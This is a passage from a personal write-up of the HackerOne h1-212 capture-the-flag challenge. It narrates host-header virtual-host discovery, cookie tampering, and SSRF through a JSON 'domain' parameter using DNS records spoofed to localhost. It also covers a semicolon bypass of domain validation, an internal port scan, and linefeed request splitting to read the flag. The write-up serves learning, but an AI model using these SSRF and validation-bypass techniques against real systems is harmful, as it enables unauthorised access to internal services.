With the h1-212 CTF, HackerOne offered a really cool chance to win a visit to New York City to hack on some exclusive targets in a top secret location. To be honest, I’m not a CTF guy at all, but this incentive caught my attention. The only thing one had to do in order to participate was: solve the CTF challenge, document the hacky way into it and hope to get selected in the end. So I decided to participate and try to get onto the plane - unfortunately my write-up wasn’t selected in the end, however I still like to share it for learning purposes :-)
Thanks to Jobert and the HackerOne team for creating a fun challenge!
The CTF was introduced by just a few lines of story:
An engineer of acme.org launched a new server for a new admin panel at http://184.108.40.206/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!
While this sounds like a very self-confident engineer, there is one big hint in these few lines to actually get a first step into the door: acme.org.
The first visit to the given URL at http://220.127.116.11/, showed nothing more than the “default Apache” page:
Identify All the Hints!
While brute-forcing a default Apache2 installation doesn’t make much sense (except if you want to rediscover /icons ;-) ), it was immediately clear that a different approach is required to solve this challenge.
What has shown to be quite fruity in my bug bounty career is changing the host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” is actually located at “admin.acme.org” - so by changing the host header from “18.104.22.168” to “admin.acme.org”:
The Apache default page was suddenly gone and the web server returned a different response:
As you might have noticed already, there is one line in this response that looks ultimately suspicious: The web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.
Building a Bridge Into the Teapot
While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.
Since cookies are actually user-controllable, imagine what would happen if the “admin” cookie value is changed to “yes”?
Surprise, the web application responded differently with an HTTP 405 like the following:
This again means that the HTTP verb needs to be changed. However when changed to HTTP POST:
The web application again responded differently with an HTTP 406 this time:
While googling around for this unusual status code, I came across the following description by W3:
10.4.7 406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.
Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.
Jumping into the Teapot
So it seems to be about a missing Content-Type declaration here. After a “Content-Type” header of “application/json” was added to the request:
A third HTTP response code - HTTP 418 aka “the teapot” was returned:
Now it was pretty obvious that it’s about a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:
The application responded with the missing parameter name:
Given the parameter name, this somehow smelled a bit like a nifty Server-Side Request Forgery challenge.
Short Excursion to SSRF
What I usually do as some sort of precaution in such scenarios is having a separate domain like “rcesec.com”, whose authoritative NS servers point to an IP/server under my control in order to be able to spoof DNS requests of all kinds. So i.e. “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, which both point to the IP address of one of my servers:
On the nameserver side, I do like to use the really awesome tool called “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records like A, AAAA, MX, CNAME or NS to whatever value you like. I usually do point all A records to the loopback address 127.0.0.1 to discover some interesting data:
Breaking the Teapot
Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:
resulted in the following response:
Funny side note here: I accidentally bypassed another input filtering which required the subdomain part of the input to the domain parameter to include the string “212”, but I only noticed this by the end of the challenge :-D
So it seems that the application accepted the value and just responded with a reference to a new PHP file (Remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:
The application responded with a huge base64-encoded string:
What was even more interesting here, is that the listening dnschef actually received a remote DNS lookup request for “h1-212.rcesec.com” just as a consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:
While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in form of the base64-encoded string returned in the response body, which was (when decoded) the actual content of the web server listening on “localhost”:
The Wrong Direction
While I was at first somehow convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation probably? ;-) ), I first wanted to retrieve the contents of Apache’s server-status page (which is usually bound to the localhost) to potentially fetch the flag from there on. However when trying to query that page using the following request (remember “h1-212.rcesec.com” did actually resolve to “127.0.0.1”, which applied to all further requests):
The application just returned an error, indicating that there was at least a very basic validation of the domain name in place requiring the domain value to be ended with the string “.com”:
Bypassing the Domain Validation (Part 1)
OK, so the application expected the domain to end with a “.com”. While trying to bypass this on common ways using i.e. “?”:
The application always responded with:
The same applies to “&”, “#” and (double-) URL-encoded representations of it. However when a semicolon was used:
The application responded again with a reference to the read.php file:
Following that one, indeed returned a base64-encoded string of the server-status output:
While I was thinking “yeah I got it finally”, it turned out that there wasn’t a flag anywhere. Although I think it was also not intended to expose the Apache-Status page at all by the engineer ;-) :
The Right Direction
While I was poking around on the localhost to find the flag for a while without any luck, I decided to go a different way and use the discovered SSRF vulnerability in order to see whether there are any other open ports listening on localhost, which are otherwise not visible from the outside. To be clear: a port scan from the Internet on the target host did only reveal the open ports 22 and 80:
Since port 22 was known to be open, it could be easily verified by using the SSRF vulnerability to check whether the port can actually be reached via localhost as well:
This returned the following output (after querying the read.php file again):
Et voila. Since scanning all ports manually and requesting everything using the read.php file was a bit inefficient, I’ve wrote a small Python script which is capable of scanning a range of given ports numbers (i.e. from 81 to 1338), fetching the “next” response and finally tries to base64-decode its value:
When run my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):
Bypassing the Domain Validation (Part 2)
So it seemed like the flag could be located somewhere on the service behind port 1337. However I noticed an interesting behaviour I haven’t thought about earlier: When a single slash after the port number was used:
The web application always returned an HTTP 404:
This is simply due to the fact that the semicolon was interpreted by the webserver as part of the path itself. So if “;.com” did not exist on the remote server, the web server did always return an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming that the flag file would be simply named “flag”, the following must be met in the end:
The domain had to end with “.com”
The URL-Splitting characters %, &, # and their (double-encoded) variants were not allowed
In the end the following request actually met all conditions:
Here I was using a unicode-based linefeed-character to split up the domain name into two parts. This actually triggered two separate requests, which could be observed by the number being added to the read.php file and its “id” parameter. So when a single request without the linefeed character was issued:
the application returned the ID “0”:
However when the linefeed payload was issued:
The read.php ID parameter was suddenly increased by two to “2” instead:
This indicated that the application actually accepted both “domains” leading to two different requests being sent. By querying the ID value minus 1 therefore returned the results from the call to “h1-212.rcesec.com:1337/flag”:
When the “data” value is base64-decoded, it finally revealed the flag: